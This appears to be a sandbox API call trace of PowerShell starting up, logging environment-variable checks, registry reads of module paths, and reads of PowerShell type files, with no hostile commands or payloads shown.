	[0346.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.035] CoTaskMemFree (pv=0x436d30) 
	[0346.040] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.040] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.040] CoTaskMemFree (pv=0x436d30) 
	[0346.041] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.041] CoTaskMemFree (pv=0x436d30) 
	[0346.041] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0346.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0346.041] CoTaskMemFree (pv=0x436d30) 
	[0347.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0347.117] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0347.117] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0347.117] CoTaskMemFree (pv=0x436d30) 
	[0347.117] CoTaskMemAlloc (cb=0xcc) returned 0x1b731cb0
	[0347.117] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b731cb0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0347.117] CoTaskMemFree (pv=0x1b731cb0) 
	[0347.118] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdb48 | out: phkResult=0x1cdb48*=0x314) returned 0x0
	[0347.118] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cdacc, lpData=0x0, lpcbData=0x1cdac8*=0x0 | out: lpType=0x1cdacc*=0x2, lpData=0x0, lpcbData=0x1cdac8*=0x6c) returned 0x0
	[0347.118] CoTaskMemAlloc (cb=0x70) returned 0x3f6470
	[0347.118] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cda9c, lpData=0x3f6470, lpcbData=0x1cda98*=0x6c | out: lpType=0x1cda9c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1cda98*=0x6c) returned 0x0
	[0347.118] CoTaskMemFree (pv=0x3f6470) 
	[0347.118] CoTaskMemAlloc (cb=0xcc) returned 0x1b731cb0
	[0347.118] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b731cb0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0347.118] CoTaskMemFree (pv=0x1b731cb0) 
	[0347.118] CoTaskMemAlloc (cb=0xcc) returned 0x1b731cb0
	[0347.118] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b731cb0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0347.118] CoTaskMemFree (pv=0x1b731cb0) 
	[0347.402] RegCloseKey (hKey=0x314) returned 0x0
	[0347.402] CoTaskMemAlloc (cb=0xcc) returned 0x1b731cb0
	[0347.403] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b731cb0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0347.403] CoTaskMemFree (pv=0x1b731cb0) 
	[0347.403] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdb48 | out: phkResult=0x1cdb48*=0x314) returned 0x0
	[0347.403] RegQueryValueExW (in: hKey=0x314, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cdacc, lpData=0x0, lpcbData=0x1cdac8*=0x0 | out: lpType=0x1cdacc*=0x0, lpData=0x0, lpcbData=0x1cdac8*=0x0) returned 0x2
	[0347.403] RegCloseKey (hKey=0x314) returned 0x0
	[0347.410] CoTaskMemAlloc (cb=0x20c) returned 0x443190
	[0347.410] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x443190 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0347.412] CoTaskMemFree (pv=0x443190) 
	[0347.412] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0347.412] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0347.413] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0347.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.413] CoTaskMemFree (pv=0x436d30) 
	[0347.413] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0347.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.413] CoTaskMemFree (pv=0x436d30) 
	[0347.415] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0347.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.415] CoTaskMemFree (pv=0x436d30) 
	[0347.415] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0347.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.415] CoTaskMemFree (pv=0x436d30) 
	[0347.417] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd938 | out: phkResult=0x1cd938*=0x31c) returned 0x0
	[0347.418] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x1cd94c, lpData=0x0, lpcbData=0x1cd948*=0x0 | out: lpType=0x1cd94c*=0x1, lpData=0x0, lpcbData=0x1cd948*=0x74) returned 0x0
	[0347.418] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x1cd8bc, lpData=0x0, lpcbData=0x1cd8b8*=0x0 | out: lpType=0x1cd8bc*=0x1, lpData=0x0, lpcbData=0x1cd8b8*=0x74) returned 0x0
	[0347.419] CoTaskMemAlloc (cb=0x78) returned 0x3f6470
	[0347.419] RegQueryValueExW (in: hKey=0x31c, lpValueName="path", lpReserved=0x0, lpType=0x1cd88c, lpData=0x3f6470, lpcbData=0x1cd888*=0x74 | out: lpType=0x1cd88c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd888*=0x74) returned 0x0
	[0347.419] CoTaskMemFree (pv=0x3f6470) 
	[0347.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0347.419] SetErrorMode (uMode=0x1) returned 0x1
	[0347.419] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd810 | out: lpFileInformation=0x1cd810*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0347.419] SetErrorMode (uMode=0x1) returned 0x1
	[0347.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0347.420] SetErrorMode (uMode=0x1) returned 0x1
	[0347.420] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd810 | out: lpFileInformation=0x1cd810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0347.420] SetErrorMode (uMode=0x1) returned 0x1
	[0347.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0347.424] SetErrorMode (uMode=0x1) returned 0x1
	[0347.424] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd810 | out: lpFileInformation=0x1cd810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0347.424] SetErrorMode (uMode=0x1) returned 0x1
	[0347.424] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0347.424] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.424] CoTaskMemFree (pv=0x436d30) 
	[0347.425] CoTaskMemAlloc (cb=0x104) returned 0x436d30
	[0347.425] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x436d30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.425] CoTaskMemFree (pv=0x436d30) 
	[0347.426] GetACP () returned 0x4e4
	[0347.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0347.438] SetErrorMode (uMode=0x1) returned 0x1
	[0347.439] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0347.439] GetFileType (hFile=0x320) returned 0x1
	[0347.439] SetErrorMode (uMode=0x1) returned 0x1
	[0347.440] GetFileType (hFile=0x320) returned 0x1
	[0347.441] ReadFile (in: hFile=0x320, lpBuffer=0x2d3c608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2d3c608*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0347.444] ReadFile (in: hFile=0x320, lpBuffer=0x2d3c608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2d3c608*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0347.444] ReadFile (in: hFile=0x320, lpBuffer=0x2d3c608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2d3c608*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0347.444] ReadFile (in: hFile=0x320, lpBuffer=0x2d3c608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2d3c608*, lpNumberOfBytesRead=0x1cd748*=0xcf3, lpOverlapped=0x0) returned 1
	[0347.445] ReadFile (in: hFile=0x320, lpBuffer=0x2d3ba63, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2d3ba63*, lpNumberOfBytesRead=0x1cd748*=0x0, lpOverlapped=0x0) returned 1
	[0347.445] ReadFile (in: hFile=0x320, lpBuffer=0x2d3c608, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2d3c608*, lpNumberOfBytesRead=0x1cd748*=0x0, lpOverlapped=0x0) returned 1
	[0347.446] CloseHandle (hObject=0x320) returned 1
	[0347.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0347.738] SetErrorMode (uMode=0x1) returned 0x1
	[0347.738] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd6c0 | out: lpFileInformation=0x1cd6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0347.738] SetErrorMode (uMode=0x1) returned 0x1
	[0347.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0347.758] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd7a8 | out: phkResult=0x1cd7a8*=0x320) returned 0x0
	[0347.758] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd72c, lpData=0x0, lpcbData=0x1cd728*=0x0 | out: lpType=0x1cd72c*=0x1, lpData=0x0, lpcbData=0x1cd728*=0x56) returned 0x0
	[0347.758] CoTaskMemAlloc (cb=0x5a) returned 0x46eea0
	[0347.758] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd6fc, lpData=0x46eea0, lpcbData=0x1cd6f8*=0x56 | out: lpType=0x1cd6fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd6f8*=0x56) returned 0x0
	[0347.758] CoTaskMemFree (pv=0x46eea0) 
	[0347.758] RegCloseKey (hKey=0x320) returned 0x0
	[0347.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0347.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0347.814] GetSystemInfo (in: lpSystemInfo=0x1cc3e0 | out: lpSystemInfo=0x1cc3e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0347.814] VirtualQuery (in: lpAddress=0x1cc490, lpBuffer=0x1cd350, dwLength=0x30 | out: lpBuffer=0x1cd350*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0348.152] SetErrorMode (uMode=0x1) returned 0x1
	[0348.152] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0348.153] GetFileType (hFile=0x320) returned 0x1
	[0348.153] SetErrorMode (uMode=0x1) returned 0x1
	[0348.153] GetFileType (hFile=0x320) returned 0x1
	[0348.153] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.153] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.153] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.153] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.153] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.154] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.154] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.154] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
	[0348.154] ReadFile (in: hFile=0x320, lpBuffer=0x2c3aaa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd748, lpOverlapped=0x0 | out: lpBuffer=0x2c3aaa0*, lpNumberOfBytesRead=0x1cd748*=0x1000, lpOverlapped=0x0) returned 1
